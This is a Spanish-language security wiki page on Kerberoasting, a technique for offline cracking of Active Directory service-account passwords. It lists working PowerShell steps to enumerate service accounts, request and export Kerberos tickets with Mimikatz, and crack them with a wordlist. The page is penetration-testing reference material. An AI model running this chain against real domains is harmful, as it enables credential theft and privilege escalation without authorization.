> For the complete documentation index, see [llms.txt](https://wiki.securiters.com/securiters-wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.securiters.com/securiters-wiki/internas/ad/pe_kerberoast.md).

# PE - Kerberoast

* Cracking offline de contraseñas de cuentas de servicio.&#x20;

* El ticket de sesión de Kerberos (TGS) tiene una parte de servidor que está cifrada con el hash de la contraseña de la cuenta de servicio. Esto hace posible solicitar un ticket y hacer un ataque de contraseña sin conexión.&#x20;

* Las cuentas de servicio son muchas veces ignoradas (las contraseñas rara vez se cambian) y tienen acceso privilegiado.&#x20;

* Los hashes de las contraseñas de las cuentas de servicio pueden ser utilizados para crear tickets Silver.&#x20;

* Encuentre las cuentas de usuario utilizadas como cuentas de servicio:&#x20;

* PowerView

```powershell
Get-NetUser –SPN
```

* Con el módulo de ActiveDirectory&#x20;

{% code overflow="wrap" %}

```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
```

{% endcode %}

* Petición a TGS

```powershell
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/domain.local"
```

* Request-SPNTicket de PowerView puede ser usado también para crackear con John o Hashcat.&#x20;
* Comprobar si se ha concedido el TGS

```powershell
klist
```

* Exportar todos los tickets usando Mimikatz

```powershell
Invoke-Mimikatz -Command '"kerberos::list /export"'
```

* Crackear la contraseña de Service account&#x20;

```powershell
python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\user@domain.local DOMAIN.LOCAL.kirbi
```
